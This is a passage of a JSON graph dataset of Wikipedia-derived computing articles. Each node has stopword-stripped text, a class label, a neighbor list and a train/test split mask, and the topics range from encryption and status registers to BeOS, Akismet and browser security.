    "mask": "Test"
  },
  {
    "node_id": 3627,
    "label": 7,
    "text": "Nebula_(computing_platform):nebula computing platform nebula federal cloud computing platform originated nasa ames research center moffett field california nebula project run acits 2 contract originally held perot systems nebula hosted many advanced research projects one application open sourced nasa developed nebula project 'nova became one two founding projects openstack project ames internet exchange aix formerly mae-west one original nodes internet major peering location tier 1 isps well home e root name servers aix provides connectivity nebula cloud enabling 10gige connections nisn nebula-project uses variety free open-source software",
    "neighbors": [
      4194,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 3628,
    "label": 6,
    "text": "DataPlow_SAN_File_System:dataplow san file system san file system sfs high-performance clustered file system created company dataplow sfs enables fast access shared files located shared storage area network san -attached storage devices sfs utilizes high-speed scalable data transfers inherent storage area networks general-purpose file system wide variety environments including scientific computing finance healthcare entertainment defense broadcast aerospace supported linux solaris os x windows supports san-based block-level storage protocols including fibre channel iscsi interoperability security specifications limits",
    "neighbors": [
      7863,
      2314,
      2395,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 3629,
    "label": 4,
    "text": "Encryption:encryption cryptography encryption process encoding message information way authorized parties access authorized encryption prevent interference denies intelligible content would-be interceptor encryption scheme intended information message referred plaintext encrypted using encryption algorithm – cipher – generating ciphertext read decrypted technical reasons encryption scheme usually uses pseudo-random encryption key generated algorithm principle possible decrypt message without possessing key well-designed encryption scheme considerable computational resources skills required authorized recipient easily decrypt message key provided originator recipients unauthorized users symmetric-key schemes encryption decryption keys communicating parties must key order achieve secure communication example symmetric key german military enigma machine key settings day allies figured machine worked able decipher information encoded within messages soon could discover encryption key given day transmissions public-key encryption schemes encryption key published anyone use encrypt messages however receiving party access decryption key enables messages read public-key encryption first described secret document 1973 encryption schemes symmetric-key also called private-key although published subsequently work diffie hellman published journal large readership value methodology explicitly described method became known diffie hellman key exchange publicly available public key encryption application called pretty good privacy pgp written 1991 phil zimmermann distributed free charge source code purchased symantec 2010 regularly updated encryption long used militaries governments facilitate secret communication commonly used protecting information within many kinds civilian systems example computer security institute reported 2007 71 companies surveyed utilized encryption data transit 53 utilized encryption data storage encryption used protect data rest information stored computers storage devices e.g usb flash drives recent years numerous reports confidential data customers personal records exposed loss theft laptops backup drives encrypting files rest helps protect physical security measures fail digital rights management systems prevent unauthorized use reproduction copyrighted material protect software reverse engineering see also copy protection another somewhat different example using encryption data rest encryption also used protect data transit example data transferred via networks e.g internet e-commerce mobile telephones wireless microphones wireless intercom systems bluetooth devices bank automatic teller machines numerous reports data transit intercepted recent years data also encrypted transmitted across networks order protect eavesdropping network traffic unauthorized users conventional methods deleting data permanently storage device involve overwriting whole content zeros ones patterns – process take significant amount time depending capacity type medium cryptography offers way making erasure almost instantaneous method called crypto-shredding example implementation method found ios devices cryptographic key kept dedicated 'effaceable storage key stored device setup offer full confidentiality protection case unauthorized person gains physical access device encryption important tool sufficient alone ensure security privacy sensitive information throughout lifetime applications encryption protect information rest transit leaving sensitive data cleartext potentially vulnerable improper disclosure processing cloud service example homomorphic encryption secure multi-party computation emerging techniques compute encrypted data techniques general turing complete incur high computational and/or communication costs response encryption data rest cyber-adversaries developed new types attacks recent threats encryption data rest include cryptographic attacks stolen ciphertext attacks attacks encryption keys insider attacks data corruption integrity attacks data destruction attacks ransomware attacks data fragmentation active defense data protection technologies attempt counter attacks distributing moving mutating ciphertext difficult identify steal corrupt destroy encryption protect confidentiality messages techniques still needed protect integrity authenticity message example verification message authentication code mac digital signature authenticated encryption algorithms designed provide encryption integrity protection together standards cryptographic software hardware perform encryption widely available successfully using encryption ensure security may challenging problem single error system design execution allow successful attacks sometimes adversary obtain unencrypted information without directly undoing encryption see example traffic analysis tempest trojan horse integrity protection mechanisms macs digital signatures must applied ciphertext first created typically device used compose message protect message end-to-end along full transmission path otherwise node sender encryption agent could potentially tamper encrypting time creation secure encryption device correct keys tampered endpoint device configured trust root certificate attacker controls example attacker inspect tamper encrypted data performing man-in-the-middle attack anywhere along message path common practice tls interception network operators represents controlled institutionally sanctioned form attack countries also attempted employ attacks form control censorship even encryption correctly hides message content tampered rest transit message length form metadata still leak sensitive information message well-known crime breach attacks https side-channel attacks relied information leakage via length encrypted content example traffic analysis broad class techniques often employs message lengths infer sensitive implementation traffic flows many messages aggregate padding message payload encrypting help obscure cleartext true length cost increasing ciphertext size introducing bandwidth overhead messages may padded randomly deterministically approach different tradeoffs encrypting padding messages form padded uniform random blobs purbs practice guaranteeing cipher text leaks metadata cleartext content leaks asymptotically minimal formula_1 information via length",
    "neighbors": [
      10242,
      5636,
      9732,
      510,
      10756,
      9225,
      6159,
      9745,
      8211,
      5142,
      535,
      4119,
      7192,
      3610,
      9242,
      4637,
      5661,
      10274,
      2084,
      3620,
      7718,
      4140,
      7725,
      2095,
      6709,
      7739,
      3133,
      8254,
      9791,
      64,
      7235,
      8265,
      10831,
      1618,
      4691,
      11349,
      87,
      1623,
      5722,
      8283,
      8797,
      8286,
      3167,
      4193,
      4194,
      5217,
      10851,
      7781,
      4710,
      9319,
      10341,
      5225,
      11368,
      107,
      622,
      7794,
      5749,
      119,
      3707,
      10876,
      5245,
      5246,
      7297,
      5251,
      6280,
      5769,
      7818,
      8329,
      8331,
      141,
      9356,
      6799,
      9360,
      1169,
      9868,
      10385,
      11418,
      156,
      9373,
      3742,
      7327,
      2213,
      3749,
      4262,
      6309,
      10405,
      10918,
      7851,
      1196,
      2733,
      9901,
      7855,
      7857,
      10417,
      2228,
      10420,
      7352,
      1211,
      190,
      3262,
      6343,
      7368,
      713,
      7369,
      8391,
      8905,
      4813,
      5325,
      10953,
      11468,
      3282,
      7891,
      7893,
      2262,
      728,
      3800,
      6360,
      6877,
      6367,
      9440,
      11487,
      5858,
      1251,
      9443,
      6373,
      9954,
      744,
      1770,
      8432,
      7409,
      5877,
      4344,
      8440,
      5372,
      5373,
      10492,
      4863,
      256,
      5887,
      2818,
      8451,
      8962,
      265,
      777,
      1801,
      4876,
      7437,
      9488,
      1297,
      1810,
      8465,
      8978,
      3350,
      11030,
      4888,
      2330,
      4892,
      5404,
      6430,
      1314,
      4389,
      3366,
      8998,
      11046,
      298,
      302,
      3886,
      3887,
      3381,
      11577,
      5434,
      6970,
      5438,
      6975,
      9025,
      3400,
      4940,
      2384,
      11089,
      6490,
      7515,
      4956,
      6494,
      3935,
      9055,
      9569,
      9058,
      2403,
      3941,
      7527,
      360,
      361,
      8040,
      11112,
      11633,
      2932,
      8052,
      6523,
      8061,
      894,
      10110,
      5504,
      7040,
      899,
      7556,
      6022,
      9607,
      904,
      10121,
      5002,
      5003,
      6028,
      2957,
      11144,
      9615,
      1941,
      5013,
      5527,
      9630,
      2975,
      931,
      7075,
      6565,
      3495,
      9640,
      1961,
      10154,
      939,
      9646,
      6575,
      11695,
      10161,
      434,
      1970,
      6578,
      437,
      4022,
      2487,
      5561,
      1978,
      10173,
      10685,
      11198,
      4032,
      5568,
      8640,
      4036,
      3525,
      9156,
      9160,
      6091,
      7117,
      8654,
      7119,
      8657,
      6098,
      2515,
      5077,
      1494,
      9688,
      474,
      8669,
      479,
      1504,
      2528,
      7135,
      8674,
      7652,
      2539,
      11244,
      3053,
      2030,
      7150,
      9714,
      5107,
      8694,
      4087,
      10232,
      9725,
      2558,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 3630,
    "label": 3,
    "text": "Status_register:status register status register flag register condition code register ccr collection status flag bits processor examples registers include flags register x86 architecture flags program status word psw register ibm system/360 architecture z/architecture application program status register apsr arm cortex-a architecture status register hardware register contains information state processor individual bits implicitly explicitly read and/or written machine code instructions executing processor status register lets instruction take action contingent outcome previous instruction typically flags status register modified effects arithmetic bit manipulation operations example z bit may set result operation zero cleared nonzero classes instructions may also modify flags indicate status example string instruction may indicate whether instruction terminated found match/mismatch found end string flags read subsequent conditional instruction specified action depending processor jump call return occurs flags indicate specified result earlier instruction cpu architectures mips alpha use dedicated flag register others implicitly set and/or read flags machines either pass implicit status information instructions pass explicitly selected general purpose register status register may often fields well specialized flags interrupt enable bits similar types information interrupt status thread currently executing preserved later recalled storing current value status register along program counter active registers machine stack reserved area memory list common cpu status register flags implemented almost modern processors processors status register also contains flags status flags enable instruction act based result previous instruction pipelined processors superscalar speculative processors create hazards slow processing require extra hardware work around long instruction word processors dispense status flags single instruction performs test indicates outcome test take action compare b jump c equal result test saved subsequent instructions another alternative status register processor instructions deposit status information general-purpose register program requests mips amd 29000 dec alpha risc-v examples architectures provide comparison instructions store comparison result general-purpose register single bit numeric value 0 1 conditional branches act based value general-purpose register usually comparison instructions test equality signed/unsigned magnitude test conditions program uses equivalence formula example mips carry bit program performing multiple-word addition test whether single-word addition registers overflowed testing whether sum lower operand codice_1 instruction sets codice_2 1 0 based specified comparison two operands general-purpose register codice_2 used status register govern conditional jump rather possible value 1 indicating carry low-order addition added high-order word scheme becomes less convenient adding three words two additions computing codice_4 either may generate carry must detected two codice_1 instructions fortunately two carries may added without risk overflow situation stabilizes five instructions per word added",
    "neighbors": [
      7173,
      9739,
      2574,
      7699,
      5655,
      10781,
      8231,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      3157,
      602,
      1122,
      7269,
      3175,
      8815,
      7281,
      5234,
      630,
      8822,
      11395,
      7313,
      1175,
      663,
      5786,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      11447,
      8890,
      4286,
      5823,
      2241,
      2243,
      5329,
      10966,
      731,
      5862,
      7911,
      10985,
      9964,
      4334,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      7421,
      1798,
      6924,
      10508,
      6926,
      6415,
      1298,
      2334,
      4385,
      5412,
      6950,
      11050,
      309,
      8501,
      5948,
      4928,
      8514,
      10571,
      6476,
      5457,
      7505,
      9044,
      11604,
      8543,
      1376,
      11107,
      10603,
      4465,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      8078,
      5523,
      9126,
      10669,
      1967,
      2480,
      5040,
      10675,
      1461,
      1463,
      7607,
      4030,
      6084,
      3014,
      9158,
      4553,
      466,
      1499,
      1502,
      5090,
      995,
      9707,
      10734,
      6639,
      499,
      4596,
      8700
    ],
    "mask": "Train"
  },
  {
    "node_id": 3631,
    "label": 2,
    "text": "BeOS_API:beos api beos api often called api inc. application programming interface required write graphical native applications beos hence derivatives haiku zeta api divided number kits collect related classes together bear relation library contains supporting code almost entirely c++ third-party bindings classes python tiny subset classes mostly storage kit related perl application kit contains basic classes required launch beos application well support global clipboard inter-application internal messaging timers rosters functions seen required support graphical application application kit classes supported libbe.so storage kit provides methods manipulating files creating managing symlinks way file open/save panels graphical applications well dealing file system attributes storage kit classes mostly libtracker.so tracker native file manager os interface kit provides large collection widgets building graphical applications main window class dialogue boxes including font handling rendering control majority libbe.so comprises kit kernel kit provides threading semaphores ability access system information also libbe.so support kit provides advanced functions readily fall another kit assisted memory allocation list support network kit provides either rudimentary beos r5 lower almost complete beos dano higher implementation berkeley sockets bind well native functions based nettle c++ networking library libnet.so provides berkeley sockets r5 later replaced common libsocket/libbind.so nomenclature libnetapi r5 later replaced libbnetapi provides modified version nettle mail kit provides native email format well way use system fetch receive email using standard protocols pop3 smtp mail kit supported libmail.so translation kit provides method whereby images plain text formats handled addons allowing applications support one format native intermediate one save/load addon-supported format api also allows video audio translation library although superseded beos r4 immediately disabled translation kit supported libtranslation.so media kit provides audio video input/output abstraction layer based pluggable addons well handling sound mixing audio video format translation media related functions media kit functions supported libmedia.so midi kit provides midi hardware input output abstraction well software synthesiser provided headspace beos r5 libmidi.so provides old beos r3 era midi api libmidi2.so provides r4+ api game kit provides number sound formats suited computer game audio output well ability run full-screen applications use video overlays opengl kit provides implementation opengl well supporting classes allow use native applications beos r5 supported opengl version 1.1 software accelerated although kit hardware-neutral fact outperformed many hardware implementations running competing platforms could deliver similar latency/bandwidth performance due underlying inefficiencies design implementation device kit provides platform-abstracted direct hardware access serial parallel ports well beboxs infamous geekport locale kit provides classes localize applications different languages timezones number formatting conventions etc kit found haiku implementation beos api services kit provides lightweight direct connection web services kit found haiku implementation beos api web kit provides means rendering web pages fork apple webkit kit found haiku implementation beos api package kit provides means package management kit found haiku implementation beos api majority api reimplemented haiku open-source beos replacement although effort catch intervening years since beos r5 additional functionality added ranging large changes mail kit support imap encrypted connections multiple accounts move opengl 1.5 support via mesa 3d alternative systems attempted draw inspiration syllable beos api making attempts provide base port applications private port much api microsoft windows later linux using gtk+ done gobe software enable port gobe productive office suite platforms beos originally developed entire api stage beos revision 3 documented two paper books developer guide advanced topics released o'reilly media inc imprint 1997/8 addition digital representation provided updated beos 2007 access co ltd owners inc intellectual property released text creative commons licence",
    "neighbors": [
      1666,
      8582,
      9491,
      10654,
      9128,
      8618,
      2603,
      7983,
      11184,
      9909,
      823,
      1339,
      1347,
      1348,
      8771,
      4550,
      7629,
      4822,
      10841,
      6236,
      1374,
      8554,
      9579,
      5743,
      3312,
      6128,
      370,
      8303,
      2804,
      8304,
      9848,
      5754
    ],
    "mask": "Test"
  },
  {
    "node_id": 3632,
    "label": 4,
    "text": "Akismet:akismet akismet spam filtering service filters spam comments trackbacks contact form messages filter works combining information spam captured participating sites using spam rules block future spam akismet offered automattic company behind wordpress.com launched october 25 2005 akismet said captured 100 billion spam comments pings october 2013 founder automattic matt mullenweg decided create akismet mother could blog safety 2005 discussions deal comment spam plug-ins available mullenweg first attempt javascript plug-in modified comment form hid fields within hours launch spammers downloaded figured worked bypassed late 2005 mullenweg launched akismet plug-in wordpress akismet stands automatic kismet way dealing spam aggregate crowd-sourced spam-fighting tool time someone posts comment participating website akismet checks comments database spam deleted spam gets user marks spam comment added database pool spam comments widens making akismet increasingly effective time akismet originally developed integrate plug-in wordpress akismet plug-in included default wordpress builds since version 2.0 activated wordpress.com-hosted blogs public akismet api resulted third-party plug-ins platforms one official akismet plug-in release open source internet forum software discourse use akismet necessary obtain api key key necessary site communicate akismet servers released terms gnu general public license akismet plug-in free software although code akismet system nature algorithm used released akismet service free personal use march 2016 commercial plans start 5/month",
    "neighbors": [
      5489,
      735
    ],
    "mask": "None"
  },
  {
    "node_id": 3633,
    "label": 7,
    "text": "Google_Cloud_Connect:google cloud connect google cloud connect free cloud computing plug-in windows microsoft office 2003 2007 2010 automatically store synchronize microsoft word document powerpoint presentation excel spreadsheet google docs google docs microsoft office formats google doc copy automatically updated time microsoft office document saved microsoft office documents edited offline synchronized later online google cloud sync maintains previous microsoft office document versions allows multiple users collaborate working document time google cloud connect discontinued april 30 2013 according google cloud connect features available google drive google cloud connect could automatically manually synchronize changes made microsoft office 2003 2007 2010 document google docs documents secured private access one user shared specific people collaboration made public anyone previous document versions retrieved",
    "neighbors": [
      4995,
      5892,
      7816,
      6797,
      5262,
      8719,
      5524,
      7700,
      10645,
      8858,
      1435,
      10525,
      2978,
      4901,
      1959,
      3499,
      10284,
      7983,
      1203,
      5431,
      7359,
      196,
      3269,
      3782,
      11590,
      4683,
      11343,
      3664,
      5202,
      3795,
      1240,
      8413,
      6367,
      2658,
      4194,
      6632,
      5483,
      236,
      9712,
      9970,
      8821,
      3836
    ],
    "mask": "Test"
  },
  {
    "node_id": 3634,
    "label": 7,
    "text": "Comm100_Live_Chat:comm100 live chat comm100 live chat free basic live support software product offered via saas software service model enables businesses organizations communicate website visitors real time improve conversions sales customer satisfaction first version comm100 live chat released august 5 2009 october 2011 comm100 live chat featured apps month techrepublic scott lowe company hit 200,000 registered business users mark october 2012 january 2013 comm100 live chat released version 7.0 features salesforce integration re-designed operator console month comm100 live chat ranked top 3 2013 best enterprise chat software category toptenreviews zero downtime upgrade comm100 live chat made possible march 2013 comm100 live chat consists 3 parts web chat window operator console control panel totally web-based version works major web browsers chrome ie firefox safari opera etc major operating systems windows mac linux operator console also cross-platform compatible desktop app apps mobile devices iphone ipad android blackberry key features comm100 live chat include comm100 live chat offers plugins integrations following",
    "neighbors": [
      2208,
      9732,
      8584,
      1353,
      10090,
      6539,
      5612,
      7983,
      6576,
      467,
      5524,
      5078,
      823,
      8536
    ],
    "mask": "Train"
  },
  {
    "node_id": 3635,
    "label": 0,
    "text": "Heaps'_law:heaps law linguistics heaps law also called herdan law empirical law describes number distinct words document set documents function document length called type-token relation formulated v number distinct words instance text size n k β free parameters determined empirically english text corpora typically k 10 100 β 0.4 0.6 law frequently attributed harold stanley heaps originally discovered mild assumptions herdan–heaps law asymptotically equivalent zipf law concerning frequencies individual words within text consequence fact type-token relation general homogenous text derived distribution types heaps law means instance text gathered diminishing returns terms discovery full vocabulary distinct terms drawn heaps law also applies situations vocabulary set distinct types attributes collection objects example objects could people types could country origin person persons selected randomly selecting based country origin heaps law says quickly representatives countries proportion population become increasingly difficult cover entire set countries continuing method sampling",
    "neighbors": [
      1890,
      3998,
      3694,
      7599
    ],
    "mask": "None"
  },
  {
    "node_id": 3636,
    "label": 1,
    "text": "Epictetus_Database_Client:epictetus database client epictetus free cross-platform multi-database administration tool used jvm run epictetus distributed freeware antilogic software discontinued since 2009",
    "neighbors": [
      10340,
      1579,
      5612,
      9389,
      7022,
      7983,
      11030,
      3096,
      9177,
      8539,
      9471
    ],
    "mask": "Test"
  },
  {
    "node_id": 3637,
    "label": 4,
    "text": "Endace:endace endace ltd privately owned network monitoring company based new zealand founded 2001 provides network visibility network recording products large organizations company listed london stock exchange 2005 delisted 2013 acquired emulex 2016 endace spun emulex currently private company october 2016 intercept revealed endace clients intelligence agencies including british gchq known conducting massive surveillance network communications moroccan dgst likewise known mass surveillance citizens endace founded dag project school computing mathematical sciences university waikato new zealand first cards designed university intended measure latency atm networks 2006 endace transitioned component manufacturer appliance manufacturer managed infrastructure provider company sells network visibility fabrics based range network recorders large corporations government agencies endace first new zealand company list london alternative investment market floated mid-june 2005 move without controversy poor share price performance early years seeming failure attract broad enough shareholder base lent weight criticism endace focused initially developing local profile via nzx rather pushing overseas investment via london aim endace headquartered auckland new zealand r centre hamilton new zealand offices australia united states great britain dag project grew academic research waikato university found software measurements atm cells packets unsatisfactory reasons accuracy lack certainty packet loss research group set developing hardware generate better quality recordings hardware subsequent iterations introduced two fundamental innovations hardware timestamping hardware accounting packet loss conventionally packet cell given timestamp host machine kernel i.e software kernel driver notified new packet arrived approach results poor quality timestamps several reasons among considerable latency jitter packet arriving network interface receipt kernel driver uncertainty caused interrupt coalescing wherein one host interrupt signifies arrival several packets poor quality limits research usefully done network performance related fields solve dag generates timestamps hardware close network interface possible obviate latency jitter problems caused interrupt coalescing hardware capable much greater accuracy precision software-generated timestamps precision comes freedom custom hardware assign many bits timestamp required accuracy assured reference external time source gps accurate ± 40 nanoseconds contrast accuracy ntp kernel clocks corrected internet order milliseconds 100,000 times less accurate depending conditions involved dag produces 64 bit timestamps fixed-point format 32 fractional bits giving potential precision formula_1 seconds 233 picoseconds actual precision offered varies particular model dag oldest giving 24 fractional bits 60 nanoseconds better precisions offered dags higher bandwidth networks timestamp derived free-running clock provided crystal oscillator accuracy crystals drift temperature age dag solution use direct digital synthesis using 1 hz pulse-per-second output many gps receivers provide reference clock mechanism described §5.5.3 stephen donnelly phd thesis also describes detail pre-commercial era models dag crucially academically significant contribution dag ability use external reference globally synchronised gps makes possible one-way time-of-flight measurements immense interest academic researchers packets flowing two points internet neither guaranteed follow path direction guaranteed timing characteristics direction outside academic world timestamp accuracy commercial applications enforcement compliance law eu markets financial instruments directive 2004 almost important timestamp accuracy guaranteeing 100 cell packet capture loss unavoidable knowing packets lost important analysing packet trace important able compensate lost packets calculating inter-arrival times commercial nics keep count dropped packets ca n't indicate packets lost dag prepends header amongst things indicates many packets dropped packet previously accepted packet dag also engineered deliver recorded packets host greatest possible efficiency together interstitial loss counter makes dag appealing surveillance applications interstitial loss counter also finds application forensics prosecutor needs able prove record complete october 2016 intercept published article showing endace customers include intelligence agencies including gchq canadian australian intelligence agencies dgst morocco ’ domestic surveillance agency edward snowden documents shown gchq installed massive surveillance network communications uk using over-sea cable europe north america",
    "neighbors": [
      9440,
      3495,
      10344,
      3211,
      10539,
      7853,
      1169,
      5363,
      343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3638,
    "label": 7,
    "text": "Recruitee:recruitee recruitee software service saas functions talent acquisition platform formerly known applicant tracking system ats includes careers site editor employer branding plugin sourcing personnel job board integration email calendar synchronization within 4 months public launch august 2015 recruitee attracted 1000 small medium-sized enterprises smes recruiting agencies worldwide 2011 perry oostdam met pawel smoczyk founder2be social network helps aspiring entrepreneurs find co-founder working remotely netherlands poland put together first product mobile activation game called georun 2014 oostdam smoczyk pivoted business built recruitee frustration hassles hiring believe hiring team effort founders hr alone launch recruitee quickly became popular got undisclosed amount seed funding september 1 2015 board members include dutch entrepreneurs robert pijselman luc brandts november 2015 recruitee announced partnership rockstart accelerator amsterdam recruitee set talent pool let applicants apply job openings startups affiliated rockstart recruitee current clients include vice magazine usabilla vlisco users customize hiring pipeline job opening users drag drop candidates profiles different stages move along hiring process users post job openings free paid job boards recruitee users bulk upload résumés synchronize emails calendars recruitee users send bulk emails candidates users import potential candidates websites using recruitee sourcing extension google chrome firefox users make careers sites showcase employer branding like company team culture",
    "neighbors": [
      467,
      5078
    ],
    "mask": "Test"
  },
  {
    "node_id": 3639,
    "label": 5,
    "text": "MediaBrowser:mediabrowser mediabrowser mediabrowser.com inc. internet browser branding company started 2000 mark c. brown made specially branded versions internet explorer various company brands themes branded web browsers made mediabrowser require internet explorer 5 higher supported windows operating systems december 5 2001 mediabrowser.com inc. went bankrupt shut site branded web browsers windows 95 windows xp internet explorer 5.0 higher windows media player 6.4 higher macromedia flash 4.0 higher also 486 mhz higher processor 32 mb ram 5 mb free hard drive space active internet connection due compatibility issues mediabrowser compatible windows vista windows 7 however run windows xp compatibility mode upon new installation mediabrowser branded browser user required register web browser using mediabrowser online registration form asked name address etc 12 years old mediabrowser shut registration process broken registration form hosted defunct web site therefore users would able use unless modified value windows registry branding consisted various brand images background navigation buttons splash screen links specific web pages related brand company mediabrower also space ads display bottom web browser mediabrowser microtron also included every mediabrowser branding display brand-related video content user late 2000 video game company nintendo partnered mediabrowser make branded browsers new upcoming video games first two browsers released upcoming pokémon gold silver video games mario tennis retailers gave cd-rom copies branded pokémon gs browser anyone pre-ordered copy pokémon gold silver special promotion later 2001 browsers released branded nintendo games paper mario nintendo power branded browser released well mediabrowser.com inc. went bankrupt december 5 2001 chapter 7 filing due company debts 2.49 million various unpaid loans web site containing branded web browsers pulled nintendo posted notice downloads page stating nintendo custom browsers currently unavailable date return keep checking nintendo.com downloads page updates thanks",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      2182,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      8443,
      9987,
      7943,
      1807,
      278,
      3350,
      7965,
      1834,
      10057,
      11082,
      2893,
      11112,
      8557,
      6528,
      3971,
      3462,
      8584,
      6028,
      7572,
      5026,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 3640,
    "label": 6,
    "text": "Allocate-on-flush:allocate-on-flush allocate-on-flush also called delayed allocation file system feature implemented hfs+ xfs reiser4 zfs btrfs ext4 feature also closely resembles older technique berkeley ufs called block reallocation blocks must allocated hold pending writes disk space appended data subtracted free-space counter actually allocated free-space bitmap instead appended data held memory must flushed storage due memory pressure kernel decides flush dirty buffers application performs unix sync system call example effect batching together allocations larger runs delayed processing reduces cpu usage tends reduce disk fragmentation especially files grow slowly also help keeping allocations contiguous several files growing time used conjunction copy write zfs convert slow random writes fast sequential writes",
    "neighbors": [
      5120,
      6434,
      9762,
      8772,
      9343,
      1801,
      5293,
      246,
      3512,
      3257,
      7070,
      2687
    ],
    "mask": "None"
  },
  {
    "node_id": 3641,
    "label": 1,
    "text": "Panorama_(database_engine):panorama database engine panorama database engine development environment macintosh microsoft windows one first applications available mac os 1984 panorama database software apple inc. macintosh microsoft windows product provue development according owner jim rea provue oldest third-party software company apart microsoft developing software macintosh personal computer panorama claim fame databases creates ram-based making extremely fast said disk speeds os application memory caching improved speed benefit becomes less less evident years go panorama popular filemaker main competitor though outlasted many similar products lacks conforming standard application conventions makes potential customisation incorporating powerful scripting language current version mac 6.0 snow leopard compatible intel cpu native windows 5.5 six years development time successor panorama x released november 2017",
    "neighbors": [
      576,
      10286,
      6797,
      4598
    ],
    "mask": "Test"
  },
  {
    "node_id": 3642,
    "label": 9,
    "text": "Equals_sign:equals sign etymology word equal latin word æqualis meaning uniform identical equal aequus level even symbol universally accepted mathematics equality first recorded welsh mathematician robert recorde whetstone witte 1557 original form symbol much wider present form book recorde explains design gemowe lines meaning twin lines latin gemellus auoide tediouſe repetition theſe woordes equalle ſette doe often woorke vſe paire paralleles gemowe lines one lengthe thus bicauſe noe .2. thynges moare equalle avoid tedious repetition words equal set often work use pair parallels gemowe lines one length thus 2 things equal according scotland university st andrews history mathematics website symbol '= immediately popular symbol || used æ œ latin word aequalis meaning equal widely used 1700s mathematics equals sign used simple statement fact specific case x 2 create definitions let x 2 conditional statements x 2 … express universal equivalence codice_1 first important computer programming language use equals sign original version fortran fortran designed 1954 implemented 1957 fortran serves assignment operator codice_2 sets value codice_3 2 somewhat resembles use mathematical definition different semantics expression following evaluated first may refer previous value codice_3 example assignment codice_5 increases value codice_3 2 rival programming-language usage pioneered original version algol designed 1958 implemented 1960 algol included relational operator tested equality allowing constructions like codice_7 essentially meaning conditional usage mathematics equals sign reserved usage usages remained common different programming languages early 21st century well fortran used assignment languages c perl python awk descendants used equality assignment pascal family ada eiffel apl languages languages basic pl/i used equals sign mean assignment equality distinguished context however languages one meanings different character often sequence characters used meaning following algol languages use equality use assignment although apl special character set uses left-pointing arrow fortran equality operator possible compare expression zero using arithmetic statement fortran iv released 1962 since used four characters .eq test equality language b introduced use == meaning copied descendant c later languages means assignment equals sign also used defining attribute–value pairs attribute assigned value php triple equals sign codice_8 denotes value type equality meaning two expressions evaluate equal values also data type instance expression codice_9 true codice_10 number 0 integer value whereas false boolean value javascript semantics codice_8 referred equality without type coercion however javascript behavior codice_12 described simple consistent rules expression codice_9 true codice_14 false even though sides codice_12 act boolean context reason sometimes recommended avoid codice_12 operator javascript favor codice_8 ruby equality codice_12 requires operands identical type e.g codice_9 false codice_8 operator flexible may defined arbitrarily given type example value type codice_21 range integers codice_22 codice_23 false since types different range vs. integer however codice_24 true since codice_8 codice_21 values means inclusion range note semantics codice_8 non-symmetric e.g codice_28 false since interpreted mean codice_29 rather codice_30 equals sign also used grammatical tone letter orthographies budu congo-kinshasa krumen mwan dan ivory coast unicode character used tone letter u+a78a different mathematical symbol u+003d possibly unique case equals sign european usage person name specifically double-barreled name pioneer aviator alberto santos-dumont also known often used double hyphen resembling equals sign two surnames place hyphen also seems personally preferred practice display equal respect father french ethnicity brazilian ethnicity mother instead double hyphen equals sign sometimes used japanese separator names ojibwe readily-available equal sign keyboard used substitute double hyphen linguistic interlinear glosses equals sign conventionally used mark clitic boundaries equals sign placed clitic word clitic attached chemical formulas two parallel lines denoting double bond commonly rendered using equals sign recent years equals sign used symbolize lgbt rights symbol used since 1995 human rights campaign lobbies marriage equality subsequently united nations free equal promotes lgbt rights united nations symbols used denote items approximately equal include following symbol used denote inequation items equal slashed equals sign ≠ u+2260 2260 alt+x microsoft windows latex done \\neq command programming languages limiting 7-bit ascii character set typeable characters use codice_31 codice_32 codice_33 codice_34 codice_35 codice_36 represent boolean inequality operator triple bar symbol ≡ u+2261 latex \\equiv often used indicate identity definition also represented u+225d ≝ u+2254 ≔ congruence relation modular arithmetic symbol ≅ often used indicate isomorphic algebraic structures congruent geometric figures equality truth values i.e bi-implication logical equivalence may denoted various symbols including ⇔ additional symbols unicode related equals sign include equals sign sometimes used incorrectly within mathematical argument connect math steps non-standard way rather show equality especially early mathematics students example one finding sum step step numbers 1 2 3 4 5 one might incorrectly write structurally shorthand notation incorrect part equality different value interpreted strictly says implies correct version argument would difficulty results subtly different uses sign education early arithmetic-focused grades equals sign may operational like equals button electronic calculator demands result calculation starting algebra courses sign takes relational meaning equality two calculations confusion two uses sign sometimes persists university level related",
    "neighbors": [
      512,
      3462,
      8582,
      6797,
      10253,
      6160,
      10145,
      428,
      8502,
      3767,
      1087,
      8644,
      8524,
      10579,
      2519,
      8554,
      3051,
      3443,
      3960,
      7292,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3643,
    "label": 4,
    "text": "Browser_security:browser security browser security application internet security web browsers order protect networked data computer systems breaches privacy malware security exploits browsers often use javascript — sometimes cross-site scripting xss — sometimes secondary payload using adobe flash security exploits also take advantage vulnerabilities security holes commonly exploited browsers including mozilla firefox google chrome opera microsoft internet explorer safari web browsers breached one following ways browser may aware breaches may show user safe connection made whenever browser communicates website website part communication collects information browser order process formatting page delivered nothing else malicious code inserted website content worst-case scenario website specifically designed host malicious code vulnerabilities specific particular browser allow malicious code run processes within browser application unintended ways remember one bits information website collects browser communication browser identity- allowing specific vulnerabilities exploited attacker able run processes visitor machine exploiting known security vulnerabilities allow attacker gain privileged access browser n't already running privileged access infected system order perform even greater variety malicious processes activities machine even victim whole network breaches web browser security usually purpose bypassing protections display pop-up advertising collecting personally identifiable information pii either internet marketing identity theft website tracking web analytics user using tools web bugs clickjacking likejacking facebook like button targeted http cookies zombie cookies flash cookies local shared objects lsos installing adware viruses 